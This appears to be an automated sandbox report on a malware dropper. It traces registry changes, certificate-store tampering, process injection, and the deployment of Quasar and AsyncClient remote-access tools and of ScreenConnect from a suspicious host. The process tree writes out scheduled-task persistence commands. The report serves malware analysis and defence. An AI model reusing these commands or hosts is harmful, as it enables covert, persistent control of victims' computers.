Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\identity = 68747470733a2f2f736967636172652e68656c702f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Installations	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gi_scre..tion_25b0fbb6ef7eb094_9edfe039055229dd\LastRunVersion = 68747470733a2f2f736967636172652e68656c702f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	ScreenConnect.WindowsClient.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\StateStore_RandomString = "BB3P4HQKM0JVL51WGCJ8XM2T"	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9\Transform = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd\SizeOfStronglyNamedComponent = e9ff020000000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd\lock!0c00000079b7570efc0900008c080000000000000000000 = 30303030303966632c30316462623137353962313764306234	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\lock!0400000079b7570efc0900008c080000000000000000000 = 30303030303966632c30316462623137353962313764306234	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb = 0000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\implication!scre..tion_25b0fbb6ef7eb094_0017.0009_14a1853 = 68747470733a2f2f736967636172652e68656c702f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9\DigestMethod = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd\Transform = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\lock!11000000fcb6570ec4140000e41300000000000000000000004b = 30303030313463342c30316462623137353937316635633261	dfsvc.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd\implication!scre..tion_25b0fbb6ef7eb094_0017.0009_14 = 68747470733a2f2f736967636172652e68656c702f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files\ScreenConnect.WindowsClient.exe.config_f7 = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\lock!0a000000ecb6570ec4140000e4130000000000000000000 = 30303030313463342c30316462623137353937316635633261	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\Transform = 01	dfsvc.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Synaptics.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb = 460061006c00730065000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9\identity = 53637265656e436f6e6e6563742e436f72652c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924\DigestValue = e92a4eaee9d896964de541ce2f01c2404b638258	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd508 = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd\lock!0e000000ecb6570ec4140000e4130000000000000000000 = 30303030313463342c30316462623137353937316635633261	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files\ScreenConnect.WindowsBackstageShell.exe.c = 01	dfsvc.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

defense_evasion spyware trojan

pid	Process
11804	reg.exe
10912	reg.exe
10668	reg.exe

Modifies system certificate store 2 TTPs 4 IoCs

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579	1804Gtwo.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054	1804Gtwo.exe
Key created	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C	1804Gtwo.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3630502724-2561614198-3854231964-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e	1804Gtwo.exe

Runs ping.exe 1 TTPs 7 IoCs

Remote System Discovery

T1018

pid	Process
1540	PING.EXE
1208	PING.EXE
6328	PING.EXE
4576	PING.EXE
8900	PING.EXE
7632	PING.EXE
4796	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 13 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
7020	schtasks.exe
8368	schtasks.exe
8532	schtasks.exe
5680	schtasks.exe
6116	schtasks.exe
3648	schtasks.exe
5236	schtasks.exe
4288	schtasks.exe
6784	schtasks.exe
4496	schtasks.exe
1580	schtasks.exe
4896	schtasks.exe
4476	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
5012	ScreenConnect.WindowsClient.exe
5676	ScreenConnect.WindowsClient.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1360	ScreenConnect.ClientService.exe
1360	ScreenConnect.ClientService.exe
1360	ScreenConnect.ClientService.exe
1360	ScreenConnect.ClientService.exe
1360	ScreenConnect.ClientService.exe
1360	ScreenConnect.ClientService.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: SeDebugPrivilege	4664	._cache_4363463463464363463463463.exe
Token: SeDebugPrivilege	3924	._cache_Synaptics.exe
Token: SeDebugPrivilege	1652	._cache_Synaptics.exe
Token: SeDebugPrivilege	5316	dfsvc.exe
Token: SeDebugPrivilege	3352	Client-built.exe
Token: SeDebugPrivilege	6008	Client-built-woprkingfr.exe
Token: SeDebugPrivilege	4864	Client.exe
Token: SeDebugPrivilege	1360	ScreenConnect.ClientService.exe
Token: SeDebugPrivilege	4584	Client-built.exe
Token: SeDebugPrivilege	5688	XClient.exe
Token: SeDebugPrivilege	780	Svchost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4864	Client.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3040 wrote to memory of 4664	3040	4363463463464363463463463.exe	85
PID 3040 wrote to memory of 4664	3040	4363463463464363463463463.exe	85
PID 3040 wrote to memory of 4664	3040	4363463463464363463463463.exe	85
PID 3040 wrote to memory of 536	3040	4363463463464363463463463.exe	89
PID 3040 wrote to memory of 536	3040	4363463463464363463463463.exe	89
PID 3040 wrote to memory of 536	3040	4363463463464363463463463.exe	89
PID 3736 wrote to memory of 5300	3736	cmd.exe	91
PID 3736 wrote to memory of 5300	3736	cmd.exe	91
PID 3736 wrote to memory of 5300	3736	cmd.exe	91
PID 536 wrote to memory of 3924	536	Synaptics.exe	92
PID 536 wrote to memory of 3924	536	Synaptics.exe	92
PID 536 wrote to memory of 3924	536	Synaptics.exe	92
PID 5300 wrote to memory of 1652	5300	Synaptics.exe	94
PID 5300 wrote to memory of 1652	5300	Synaptics.exe	94
PID 5300 wrote to memory of 1652	5300	Synaptics.exe	94
PID 3924 wrote to memory of 5500	3924	._cache_Synaptics.exe	97
PID 3924 wrote to memory of 5500	3924	._cache_Synaptics.exe	97
PID 3924 wrote to memory of 5500	3924	._cache_Synaptics.exe	97
PID 1652 wrote to memory of 1932	1652	._cache_Synaptics.exe	98
PID 1652 wrote to memory of 1932	1652	._cache_Synaptics.exe	98
PID 1652 wrote to memory of 1932	1652	._cache_Synaptics.exe	98
PID 5500 wrote to memory of 5316	5500	1804Gtwo.exe	99
PID 5500 wrote to memory of 5316	5500	1804Gtwo.exe	99
PID 1932 wrote to memory of 5240	1932	vncgroups.exe	104
PID 1932 wrote to memory of 5240	1932	vncgroups.exe	104
PID 1932 wrote to memory of 5240	1932	vncgroups.exe	104
PID 5080 wrote to memory of 876	5080	cmd.exe	105
PID 5080 wrote to memory of 876	5080	cmd.exe	105
PID 5080 wrote to memory of 876	5080	cmd.exe	105
PID 2168 wrote to memory of 2008	2168	cmd.exe	110
PID 2168 wrote to memory of 2008	2168	cmd.exe	110
PID 2168 wrote to memory of 2008	2168	cmd.exe	110
PID 640 wrote to memory of 2920	640	cmd.exe	111
PID 640 wrote to memory of 2920	640	cmd.exe	111
PID 640 wrote to memory of 2920	640	cmd.exe	111
PID 5928 wrote to memory of 2924	5928	cmd.exe	112
PID 5928 wrote to memory of 2924	5928	cmd.exe	112
PID 5928 wrote to memory of 2924	5928	cmd.exe	112
PID 3924 wrote to memory of 2232	3924	._cache_Synaptics.exe	113
PID 3924 wrote to memory of 2232	3924	._cache_Synaptics.exe	113
PID 3924 wrote to memory of 2232	3924	._cache_Synaptics.exe	113
PID 1652 wrote to memory of 3352	1652	._cache_Synaptics.exe	116
PID 1652 wrote to memory of 3352	1652	._cache_Synaptics.exe	116
PID 4664 wrote to memory of 6008	4664	._cache_4363463463464363463463463.exe	117
PID 4664 wrote to memory of 6008	4664	._cache_4363463463464363463463463.exe	117
PID 6008 wrote to memory of 5680	6008	Client-built-woprkingfr.exe	119
PID 6008 wrote to memory of 5680	6008	Client-built-woprkingfr.exe	119
PID 6008 wrote to memory of 4864	6008	Client-built-woprkingfr.exe	122
PID 6008 wrote to memory of 4864	6008	Client-built-woprkingfr.exe	122
PID 4864 wrote to memory of 4896	4864	Client.exe	123
PID 4864 wrote to memory of 4896	4864	Client.exe	123
PID 5316 wrote to memory of 2556	5316	dfsvc.exe	126
PID 5316 wrote to memory of 2556	5316	dfsvc.exe	126
PID 5316 wrote to memory of 2556	5316	dfsvc.exe	126
PID 2556 wrote to memory of 544	2556	ScreenConnect.WindowsClient.exe	128
PID 2556 wrote to memory of 544	2556	ScreenConnect.WindowsClient.exe	128
PID 2556 wrote to memory of 544	2556	ScreenConnect.WindowsClient.exe	128
PID 2232 wrote to memory of 3676	2232	444.exe	129
PID 2232 wrote to memory of 3676	2232	444.exe	129
PID 2232 wrote to memory of 3676	2232	444.exe	129
PID 1360 wrote to memory of 5012	1360	ScreenConnect.ClientService.exe	131
PID 1360 wrote to memory of 5012	1360	ScreenConnect.ClientService.exe	131
PID 1360 wrote to memory of 5012	1360	ScreenConnect.ClientService.exe	131
PID 1360 wrote to memory of 5676	1360	ScreenConnect.ClientService.exe	134

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3040
- C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe"
  2⤵
  - Downloads MZ/PE file
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4664
- - C:\Users\Admin\AppData\Local\Temp\Files\Client-built-woprkingfr.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Client-built-woprkingfr.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:6008
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5680
  - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
      "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4864
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4896
- - C:\Users\Admin\AppData\Local\Temp\Files\donut.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\donut.exe"
    3⤵
    PID:5720
- - C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
    3⤵
    PID:6044
- - C:\Users\Admin\AppData\Local\Temp\Files\AsyncClient.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\AsyncClient.exe"
    3⤵
    PID:8084
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "update" /tr '"C:\Users\Admin\AppData\Local\Temp\update.exe"' & exit
      4⤵
      PID:1508
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "update" /tr '"C:\Users\Admin\AppData\Local\Temp\update.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8368
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF373.tmp.bat""
      4⤵
      PID:6808
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:8692
    - - C:\Users\Admin\AppData\Local\Temp\update.exe
        
        "C:\Users\Admin\AppData\Local\Temp\update.exe"
        5⤵
        
        PID:9468
- - C:\Users\Admin\AppData\Local\Temp\Files\WinPlugins.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\WinPlugins.exe"
    3⤵
    PID:3196
  - - C:\Users\Admin\AppData\Local\Temp\rtsf.exe
      "C:\Users\Admin\AppData\Local\Temp\rtsf.exe"
      4⤵
      PID:7392
